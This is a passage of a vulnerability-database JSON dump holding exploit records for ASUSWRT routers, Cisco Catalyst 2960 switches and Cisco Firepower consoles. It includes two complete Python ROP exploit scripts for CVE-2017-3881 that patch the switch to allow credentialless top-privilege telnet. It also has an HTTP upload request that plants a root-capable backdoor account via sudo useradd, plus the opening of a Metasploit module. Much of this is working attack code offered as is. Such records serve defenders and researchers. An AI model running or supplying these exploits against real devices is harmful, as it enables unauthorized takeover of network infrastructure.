strlen(post_buf) - offset;\r\n\t\t\tp = post_buf;\r\n\t\t\tname = strstr(p, \"\\\"\") + 1;\r\n\t\t\tp = strstr(name, \"\\\"\");\r\n\t\t\tstrcpy(p++, \"\\0\");\r\n\t\t\tvalue = strstr(p, \"\\r\\n\\r\\n\") + 4;\r\n\t\t\tp = strstr(value, \"\\r\");\r\n\t\t\tstrcpy(p, \"\\0\");\r\n\t\t\t//printf(\"%s=%s\\n\", name, value);\r\n\t\t\tnvram_set(name, 
value);\r\n\t\t}\r\n\t}\r\n...\r\n}\r\n\r\nThese NVRAM values contain very important configuration variables, such as the admin password, which can be set in this way by an authenticated or unauthenticated attacker.\r\n\r\nOnce that is done, code execution is easily achieved. One option is to login to the web interface with the new password, enable SSH, reboot the router and login via SSH.\r\n\r\nA more elegant option is to abuse infosvr, which is a UDP daemon running on port 9999.\r\nThe daemon has a special mode where it executes a command received in a packet as the root user. This special mode is only enabled if ateCommand_flag is set to 1, which most likely only happens during factory testing or QA (it was not enabled by default in the firmware distributed by Asus in their website).\r\n\r\nHowever we can set ateCommand_flag to 1 using the VPN configuration upload technique described above and then send a PKT_SYSCMD to infosvr. The daemon will read a command from the packet and execute it as root, achieving our command execution cleanly - without changing any passwords.\r\n\r\n(Note: infosvr used to allow unauthenticated command execution without the ateCommand_flag being set, which led to Joshua Drake's (jduck) discovery of CVE-2014-9583, see [2]; this was fixed by Asus in early 2015).\r\n\r\nPacket structure (from AsusWRT_source/router/shared/iboxcom.h):\r\n- Header\r\n typedef struct iboxPKTEx\r\n {\r\n BYTE\t\tServiceID;\r\n BYTE\t\tPacketType;\r\n WORD\t\tOpCode;\r\n DWORD \t\tInfo; // Or Transaction ID\r\n BYTE\t\tMacAddress[6];\r\n BYTE\t\tPassword[32]; //NULL terminated string, string length:1~31, cannot be NULL string\r\n } ibox_comm_pkt_hdr_ex;\r\n\r\n- Body\r\n typedef struct iboxPKTCmd\r\n {\r\n WORD\t\tlen;\r\n BYTE\t\tcmd[420];\t\t<--- command goes here\r\n } PKT_SYSCMD;\t\t// total 422 bytes\r\n\r\nA Metasploit module exploiting this vulnerability has been released [3].\r\n\r\n\r\n>> Fix:\r\nUpgrade to AsusWRT v3.0.0.4.384.10007 or above.\r\nSee 
[4] for the very few details and new firmware released by Asus.\r\n\r\n\r\n>> References:\r\n[1] https://blogs.securiteam.com/index.php/archives/3589\r\n[2] https://github.com/jduck/asus-cmd\r\n[3] https://raw.githubusercontent.com/pedrib/PoC/master/exploits/metasploit/asuswrt_lan_rce.rb\r\n[4] https://www.asus.com/Static_WebPage/ASUS-Product-Security-Advisory/\r\n\r\n================\r\nAgile Information Security Limited\r\nhttp://www.agileinfosec.co.uk/\r\n>> Enabling secure digital business >>", "sourceHref": "https://www.exploit-db.com/raw/43881", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-04-13T11:17:45", "description": "Cisco Catalyst 2960 IOS 12.2(55)SE1 - 'ROCEM' Remote Code Execution. CVE-2017-3881. Remote exploit for Hardware platform", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2017-04-12T00:00:00", "type": "exploitdb", "title": "Cisco Catalyst 2960 IOS 12.2(55)SE1 - 'ROCEM' Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-3881"], "modified": "2017-04-12T00:00:00", "id": "EDB-ID:41874", "href": 
"https://www.exploit-db.com/exploits/41874/", "sourceData": "#!/usr/bin/python\r\n# Author:\r\n# Artem Kondratenko (@artkond)\r\n\r\nimport socket\r\nimport sys\r\nfrom time import sleep\r\n\r\nset_credless = True\r\n\r\nif len(sys.argv) < 3:\r\n\tprint sys.argv[0] + ' [host] --set/--unset'\r\n\tsys.exit()\r\nelif sys.argv[2] == '--unset':\r\n\tset_credless = False\r\nelif sys.argv[2] == '--set':\r\n\tpass\r\nelse:\r\n\tprint sys.argv[0] + ' [host] --set/--unset'\r\n\tsys.exit()\r\n\r\n\r\ns = socket.socket( socket.AF_INET, socket.SOCK_STREAM)\r\ns.connect((sys.argv[1], 23))\r\n\r\nprint '[+] Connection OK'\r\nprint '[+] Recieved bytes from telnet service:', repr(s.recv(1024))\r\n#sleep(0.5)\r\nprint '[+] Sending cluster option'\r\n\r\nprint '[+] Setting credless privilege 15 authentication' if set_credless else '[+] Unsetting credless privilege 15 authentication'\r\n\r\n\r\n\r\npayload = '\\xff\\xfa\\x24\\x00'\r\npayload += '\\x03CISCO_KITS\\x012:'\r\npayload += 'A' * 116\r\npayload += '\\x00\\x00\\x37\\xb4'\t\t# first gadget address 0x000037b4: lwz r0, 0x14(r1); mtlr r0; lwz r30, 8(r1); lwz r31, 0xc(r1); addi r1, r1, 0x10; blr;\r\n#next bytes are shown as offsets from r1\r\npayload += '\\x02\\x2c\\x8b\\x74'\t\t# +8 address of pointer to is_cluster_mode function - 0x34\r\nif set_credless is True:\r\n\tpayload += '\\x00\\x00\\x99\\x80'\t# +12 set address of func that rets 1\r\nelse:\r\n\tpayload +=\t'\\x00\\x04\\xea\\x58'\t# unset \r\npayload += 'BBBB'\t\t\t\t\t# +16(+0) r1 points here at second gadget\r\npayload += '\\x00\\xdf\\xfb\\xe8' \t\t# +4 second gadget address 0x00dffbe8: stw r31, 0x138(r30); lwz r0, 0x1c(r1); mtlr r0; lmw r29, 0xc(r1); addi r1, r1, 0x18; blr;\r\npayload += 'CCCC'\t\t\t\t\t# +8 \r\npayload += 'DDDD'\t\t\t\t\t# +12\r\npayload += 'EEEE'\t\t\t\t\t# +16(+0) r1 points here at third gadget\r\npayload += '\\x00\\x06\\x78\\x8c'\t\t# +20(+4) third gadget address. 
0x0006788c: lwz r9, 8(r1); lwz r3, 0x2c(r9); lwz r0, 0x14(r1); mtlr r0; addi r1, r1, 0x10; blr; \r\npayload += '\\x02\\x2c\\x8b\\x60'\t\t# +8 r1+8 = 0x022c8b60\r\npayload += 'FFFF'\t\t\t\t\t# +12 \r\npayload += 'GGGG'\t\t\t\t\t# +16(+0) r1 points here at fourth gadget \r\npayload += '\\x00\\x6b\\xa1\\x28' \t\t# +20(+4) fourth gadget address 0x006ba128: lwz r31, 8(r1); lwz r30, 0xc(r1); addi r1, r1, 0x10; lwz r0, 4(r1); mtlr r0; blr;\r\nif set_credless:\r\n\tpayload += '\\x00\\x12\\x52\\x1c'\t# +8 address of the replacing function that returns 15 (our desired privilege level). 0x0012521c: li r3, 0xf; blr; \r\nelse:\r\n\tpayload += '\\x00\\x04\\xe6\\xf0'\t# unset\r\npayload += 'HHHH'\t\t\t\t\t# +12\r\npayload += 'IIII'\t\t\t\t\t# +16(+0) r1 points here at fifth gadget\r\npayload += '\\x01\\x48\\xe5\\x60'\t\t# +20(+4) fifth gadget address 0x0148e560: stw r31, 0(r3); lwz r0, 0x14(r1); mtlr r0; lwz r31, 0xc(r1); addi r1, r1, 0x10; blr;\r\npayload += 'JJJJ'\t\t\t\t\t# +8 r1 points here at third gadget\r\npayload += 'KKKK'\t\t\t\t\t# +12\r\npayload += 'LLLL'\t\t\t\t\t# +16\r\npayload += '\\x01\\x13\\x31\\xa8'\t\t# +20 original execution flow return addr\r\npayload += ':15:' + '\\xff\\xf0'\r\n\r\ns.send(payload)\r\n\r\nprint '[+] All done'\r\n\r\ns.close()", "sourceHref": "https://www.exploit-db.com/download/41874/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2023-09-25T23:37:42", "description": "", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2016-10-05T00:00:00", "type": "exploitdb", "title": "Cisco Firepower Threat 
Management Console 6.0.1 - Remote Command Execution", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["2016-6433", "CVE-2016-6433"], "modified": "2016-10-05T00:00:00", "id": "EDB-ID:40463", "href": "https://www.exploit-db.com/exploits/40463", "sourceData": "KL-001-2016-007 : Cisco Firepower Threat Management Console Remote Command\r\nExecution Leading to Root Access\r\n\r\nTitle: Cisco Firepower Threat Management Console Remote Command Execution\r\nLeading to Root Access\r\nAdvisory ID: KL-001-2016-007\r\nPublication Date: 2016.10.05\r\nPublication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2016-007.txt\r\n\r\n\r\n1. Vulnerability Details\r\n\r\n Affected Vendor: Cisco\r\n Affected Product: Firepower Threat Management Console\r\n Affected Version: Cisco Fire Linux OS 6.0.1 (build 37/build 1213)\r\n Platform: Embedded Linux\r\n CWE Classification: CWE-434: Unrestricted Upload of File with Dangerous\r\n Type, CWE-94: Improper Control of Generation of Code\r\n Impact: Arbitrary Code Execution\r\n Attack vector: HTTP\r\n CVE-ID: CVE-2016-6433\r\n\r\n2. Vulnerability Description\r\n\r\n An authenticated user can run arbitrary system commands as\r\n the www user which leads to root.\r\n\r\n3. Technical Description\r\n\r\n A valid session and CSRF token is required. 
The webserver runs as\r\n a non-root user which is permitted to sudo commands as root with\r\n no password.\r\n\r\n POST /DetectionPolicy/rules/rulesimport.cgi?no_mojo=1 HTTP/1.1\r\n Host: 1.3.3.7\r\n User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:45.0)\r\nGecko/20100101 Firefox/45.0\r\n Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n Accept-Language: en-US,en;q=0.5\r\n Accept-Encoding: gzip, deflate, br\r\n DNT: 1\r\n Cookie: CGISESSID=4919a7838198009bba48f6233d0bd1c6\r\n Connection: close\r\n Content-Type: multipart/form-data;\r\nboundary=---------------------------15519792567789791301241925798\r\n Content-Length: 813\r\n\r\n -----------------------------15519792567789791301241925798\r\n Content-Disposition: form-data; name=\"manual_update\"\r\n\r\n 1\r\n -----------------------------15519792567789791301241925798\r\n Content-Disposition: form-data; name=\"source\"\r\n\r\n file\r\n -----------------------------15519792567789791301241925798\r\n Content-Disposition: form-data; name=\"file\";\r\nfilename=\"Sourcefire_Rule_Update-2016-03-04-001-vrt.sh\"\r\n Content-Type: application/octet-stream\r\n\r\n sudo useradd -G ldapgroup -p `openssl passwd -1 korelogic` korelogic\r\n -----------------------------15519792567789791301241925798\r\n Content-Disposition: form-data; name=\"action_submit\"\r\n\r\n Import\r\n -----------------------------15519792567789791301241925798\r\n Content-Disposition: form-data; name=\"sf_action_id\"\r\n\r\n 8c6059ae8dbedc089877b16b7be2ae7f\r\n -----------------------------15519792567789791301241925798--\r\n\r\n\r\n HTTP/1.1 200 OK\r\n Date: Sat, 23 Apr 2016 13:38:01 GMT\r\n Server: Apache\r\n Vary: Accept-Encoding\r\n X-Frame-Options: SAMEORIGIN\r\n Content-Length: 49998\r\n Connection: close\r\n Content-Type: text/html; charset=utf-8\r\n\r\n ...\r\n\r\n $ ssh korelogic@1.3.3.7\r\n Password:\r\n\r\n Copyright 2004-2016, Cisco and/or its affiliates. 
All rights reserved.\r\n Cisco is a registered trademark of Cisco Systems, Inc.\r\n All other trademarks are property of their respective owners.\r\n\r\n Cisco Fire Linux OS v6.0.1 (build 37)\r\n Cisco Firepower Management Center for VMWare v6.0.1 (build 1213)\r\n\r\n Could not chdir to home directory /Volume/home/korelogic: No such file or\r\ndirectory\r\n korelogic@firepower:/$ sudo su -\r\n Password:\r\n root@firepower:~#\r\n\r\n4. Mitigation and Remediation Recommendation\r\n\r\n The vendor has acknowledged this vulnerability but has\r\n not issued a fix. Vendor acknowledgement available at:\r\n\r\nhttps://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20161005-ftmc\r\n\r\n5. Credit\r\n\r\n This vulnerability was discovered by Matt Bergin (@thatguylevel) of\r\nKoreLogic, Inc.\r\n\r\n6. Disclosure Timeline\r\n\r\n 2016.06.30 - KoreLogic sends vulnerability report and PoC to Cisco.\r\n 2016.06.30 - Cisco acknowledges receipt of vulnerability report.\r\n 2016.07.20 - KoreLogic and Cisco discuss remediation timeline for\r\n this vulnerability and for 3 others reported in the\r\n same product.\r\n 2016.08.12 - 30 business days have elapsed since the vulnerability was\r\n reported to Cisco.\r\n 2016.09.02 - 45 business days have elapsed since the vulnerability was\r\n reported to Cisco.\r\n 2016.09.09 - KoreLogic asks for an update on the status of the\r\n remediation efforts.\r\n 2016.09.15 - Cisco confirms remediation is underway and soon to be\r\n completed.\r\n 2016.09.28 - Cisco informs KoreLogic that the acknowledgement details\r\n will be released publicly on 2016.10.05.\r\n 2016.10.05 - Public disclosure.\r\n\r\n7. Proof of Concept\r\n\r\n See Technical Description\r\n\r\n\r\nThe contents of this advisory are copyright(c) 2016\r\nKoreLogic, Inc. and are licensed under a Creative Commons\r\nAttribution Share-Alike 4.0 (United States) License:\r\nhttp://creativecommons.org/licenses/by-sa/4.0/\r\n\r\nKoreLogic, Inc. 
is a founder-owned and operated company with a\r\nproven track record of providing security services to entities\r\nranging from Fortune 500 to small and mid-sized companies. We\r\nare a highly skilled team of senior security consultants doing\r\nby-hand security assessments for the most important networks in\r\nthe U.S. and around the world. We are also developers of various\r\ntools and resources aimed at helping the security community.\r\nhttps://www.korelogic.com/about-korelogic.html\r\n\r\nOur public vulnerability disclosure policy is available at:\r\nhttps://www.korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.2.txt", "sourceHref": "https://www.exploit-db.com/raw/40463", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2023-09-25T22:24:21", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-04-12T00:00:00", "type": "exploitdb", "title": "Cisco Catalyst 2960 IOS 12.2(55)SE11 - 'ROCEM' Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["2017-3881", "CVE-2017-3881"], "modified": "2017-04-12T00:00:00", "id": "EDB-ID:41872", 
"href": "https://www.exploit-db.com/exploits/41872", "sourceData": "#!/usr/bin/python\r\n# Exploit Title: Cisco Catalyst 2960 - Buffer Overflow\r\n# Exploit Details: https://artkond.com/2017/04/10/cisco-catalyst-remote-code-execution/\r\n# Date: 04.10.2017\r\n# Exploit Author: https://twitter.com/artkond\r\n# Vendor Homepage: https://www.cisco.com/\r\n# Version: IOS version c2960-lanbasek9-mz.122-55.SE11)\r\n# Tested on: Catalyst 2960 with IOS version c2960-lanbasek9-mz.122-55.SE11\r\n# CVE : CVE-2017-3881\r\n# Description:\r\n#\r\n# The exploit connects to the Catalyst switch and patches\r\n# it execution flow to allow credless telnet interaction \r\n# with highest privilege level\r\n#\r\n\r\n\r\nimport socket\r\nimport sys\r\nfrom time import sleep\r\n\r\nset_credless = True\r\n\r\nif len(sys.argv) < 3:\r\n\tprint sys.argv[0] + ' [host] --set/--unset'\r\n\tsys.exit()\r\nelif sys.argv[2] == '--unset':\r\n\tset_credless = False\r\nelif sys.argv[2] == '--set':\r\n\tpass\r\nelse:\r\n\tprint sys.argv[0] + ' [host] --set/--unset'\r\n\tsys.exit()\r\n\r\n\r\ns = socket.socket( socket.AF_INET, socket.SOCK_STREAM)\r\ns.connect((sys.argv[1], 23))\r\n\r\nprint '[+] Connection OK'\r\nprint '[+] Recieved bytes from telnet service:', repr(s.recv(1024))\r\nprint '[+] Sending cluster option'\r\nprint '[+] Setting credless privilege 15 authentication' if set_credless else '[+] Unsetting credless privilege 15 authentication'\r\n\r\n\r\n\r\npayload = '\\xff\\xfa\\x24\\x00'\r\npayload += '\\x03CISCO_KITS\\x012:'\r\npayload += 'A' * 116\r\npayload += '\\x00\\x00\\x37\\xb4'\t\t# first gadget address 0x000037b4: lwz r0, 0x14(r1); mtlr r0; lwz r30, 8(r1); lwz r31, 0xc(r1); addi r1, r1, 0x10; blr;\r\n#next bytes are shown as offsets from r1\r\npayload += '\\x02\\x3d\\x55\\xdc'\t\t# +8 address of pointer to is_cluster_mode function - 0x34\r\nif set_credless is True:\r\n\tpayload += '\\x00\\x00\\x99\\x9c'\t# +12 set address of func that rets 1\r\nelse:\r\n\tpayload 
+=\t'\\x00\\x04\\xeA\\xe0'\t# unset \r\npayload += 'BBBB'\t\t\t\t\t# +16(+0) r1 points here at second gadget\r\npayload += '\\x00\\xe1\\xa9\\xf4' \t\t# +4 second gadget address 0x00e1a9f4: stw r31, 0x138(r30); lwz r0, 0x1c(r1); mtlr r0; lmw r29, 0xc(r1); addi r1, r1, 0x18; blr;\r\npayload += 'CCCC'\t\t\t\t\t# +8 \r\npayload += 'DDDD'\t\t\t\t\t# +12\r\npayload += 'EEEE'\t\t\t\t\t# +16(+0) r1 points here at third gadget\r\npayload += '\\x00\\x06\\x7b\\x5c'\t\t# +20(+4) third gadget address. 0x00067b5c: lwz r9, 8(r1); lwz r3, 0x2c(r9); lwz r0, 0x14(r1); mtlr r0; addi r1, r1, 0x10; blr; \r\npayload += '\\x02\\x3d\\x55\\xc8'\t\t# +8 r1+8 = 0x23d55c8\r\npayload += 'FFFF'\t\t\t\t\t# +12 \r\npayload += 'GGGG'\t\t\t\t\t# +16(+0) r1 points here at fourth gadget \r\npayload += '\\x00\\x6c\\xb3\\xa0' \t\t# +20(+4) fourth gadget address 0x006cb3a0: lwz r31, 8(r1); lwz r30, 0xc(r1); addi r1, r1, 0x10; lwz r0, 4(r1); mtlr r0; blr;\r\nif set_credless:\r\n\tpayload += '\\x00\\x27\\x0b\\x94'\t# +8 address of the replacing function that returns 15 (our desired privilege level). 
0x00270b94: li r3, 0xf; blr; \r\nelse:\r\n\tpayload += '\\x00\\x04\\xe7\\x78'\t# unset\r\npayload += 'HHHH'\t\t\t\t\t# +12\r\npayload += 'IIII'\t\t\t\t\t# +16(+0) r1 points here at fifth gadget\r\npayload += '\\x01\\x4a\\xcf\\x98'\t\t# +20(+4) fifth gadget address 0x0148e560: stw r31, 0(r3); lwz r0, 0x14(r1); mtlr r0; lwz r31, 0xc(r1); addi r1, r1, 0x10; blr;\r\npayload += 'JJJJ'\t\t\t\t\t# +8 r1 points here at third gadget\r\npayload += 'KKKK'\t\t\t\t\t# +12\r\npayload += 'LLLL'\t\t\t\t\t# +16\r\npayload += '\\x01\\x14\\xe7\\xec'\t\t# +20 original execution flow return addr\r\npayload += ':15:' + '\\xff\\xf0'\r\n\r\ns.send(payload)\r\n\r\nprint '[+] All done'\r\n\r\ns.close()", "sourceHref": "https://www.exploit-db.com/raw/41872", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "saint": [{"lastseen": "2023-07-13T15:27:58", "description": "Added: 02/28/2018 \nCVE: [CVE-2018-5999](<https://vulners.com/cve/CVE-2018-5999>) \n\n\n### Background\n\n[ASUSWRT](<https://www.asus.com/ASUSWRT/>) is the firmware used in many ASUS devices. \n\n### Problem\n\nThe combination of two separate vulnerabilities in ASUSWRT allows remote attackers to execute arbitrary commands. The first vulnerability allows an unauthenticated user to make certain POST requests. The second allows NVRAM settings to be changed using a POST request to `**vpnupload.cgi**`. \n\n### Resolution\n\nUpgrade to ASUSWRT version 3.0.0.4.384_10007 or higher. 
\n\n### References\n\n<http://seclists.org/fulldisclosure/2018/Jan/78> \n\n\n### Platforms\n\nLinux \n \n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-02-28T00:00:00", "type": "saint", "title": "ASUSWRT vpnupload.cgi authentication bypass", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-5999"], "modified": "2018-02-28T00:00:00", "id": "SAINT:9EC44034675C3CB4D052F0A57AE94026", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/asuswrt_vpnupload_auth_bypass", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-28T14:33:22", "description": "Added: 02/28/2018 \nCVE: [CVE-2018-5999](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5999>) \n\n\n### Background\n\n[ASUSWRT](<https://www.asus.com/ASUSWRT/>) is the firmware used in many ASUS devices. \n\n### Problem\n\nThe combination of two separate vulnerabilities in ASUSWRT allows remote attackers to execute arbitrary commands. The first vulnerability allows an unauthenticated user to make certain POST requests. 
The second allows NVRAM settings to be changed using a POST request to `**vpnupload.cgi**`. \n\n### Resolution\n\nUpgrade to ASUSWRT version 3.0.0.4.384_10007 or higher. \n\n### References\n\n<http://seclists.org/fulldisclosure/2018/Jan/78> \n\n\n### Platforms\n\nLinux \n \n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-02-28T00:00:00", "type": "saint", "title": "ASUSWRT vpnupload.cgi authentication bypass", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-5999"], "modified": "2018-02-28T00:00:00", "id": "SAINT:1FAFFE9723ECA2EE5DFB56A36466F828", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/asuswrt_vpnupload_auth_bypass", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-23T15:16:57", "description": "Added: 02/28/2018 \nCVE: [CVE-2018-5999](<https://vulners.com/cve/CVE-2018-5999>) \n\n\n### Background\n\n[ASUSWRT](<https://www.asus.com/ASUSWRT/>) is the firmware used in many ASUS devices. \n\n### Problem\n\nThe combination of two separate vulnerabilities in ASUSWRT allows remote attackers to execute arbitrary commands. 
The first vulnerability allows an unauthenticated user to make certain POST requests. The second allows NVRAM settings to be changed using a POST request to `**vpnupload.cgi**`. \n\n### Resolution\n\nUpgrade to ASUSWRT version 3.0.0.4.384_10007 or higher. \n\n### References\n\n<http://seclists.org/fulldisclosure/2018/Jan/78> \n\n\n### Platforms\n\nLinux \n \n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-02-28T00:00:00", "type": "saint", "title": "ASUSWRT vpnupload.cgi authentication bypass", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-5999"], "modified": "2018-02-28T00:00:00", "id": "SAINT:5069DD588A8DDA678A16F6B17DE4B1F1", "href": "https://download.saintcorporation.com/cgi-bin/exploit_info/asuswrt_vpnupload_auth_bypass", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "seebug": [{"lastseen": "2017-11-19T12:01:21", "description": "No description provided by source.", "cvss3": {}, "published": "2017-02-24T00:00:00", "type": "seebug", "title": "Cisco Firepower Management Console 6.0 - Post Authentication UserAdd (CVE-2016-6433)", "bulletinFamily": 
"exploit", "cvss2": {}, "cvelist": ["CVE-2016-6433"], "modified": "2017-02-24T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-92711", "id": "SSV:92711", "sourceData": "\n ##\r\n# This module requires Metasploit: http://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n include Msf::Exploit::CmdStager\r\n include Msf::Exploit::Remote::SSH\r\n\r\n def initialize(info={})\r\n super(update_info(info,\r\n 'Name' => \"Cisco Firepower Management Console 6.0 Post Authentication UserAdd Vulnerability\",\r\n 'Description' => %q{\r\n This module exploits a vulnerability found in Cisco Firepower Management Console.\r\n The management system contains a configuration flaw that allows the www user to\r\n execute the useradd binary, which can be abused to create backdoor accounts.\r\n Authentication is required to exploit this vulnerability.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Matt', # Original discovery & PoC\r\n 'sinn3r' # Metasploit module\r\n ],\r\n 'References' =>\r\n [\r\n [ 'CVE', '2016-6433' ],\r\n [ 'URL', 'https://blog.korelogic.com/blog/2016/10/10/virtual_appliance_spelunking' ]\r\n ],\r\n 'Platform' => 'linux',\r\n 'Arch' => ARCH_X86,\r\n 'Targets' =>\r\n [\r\n [ 'Cisco Firepower Management Console 6.0.1 (build 1213)', {} ]\r\n ],\r\n 'Privileged' => false,\r\n 'DisclosureDate' => 'Oct 10 2016',\r\n 'CmdStagerFlavor'=> %w{ echo },\r\n 'DefaultOptions' =>\r\n {\r\n 'SSL' => 'true',\r\n 'SSLVersion' => 'Auto',\r\n 'RPORT' => 443\r\n },\r\n 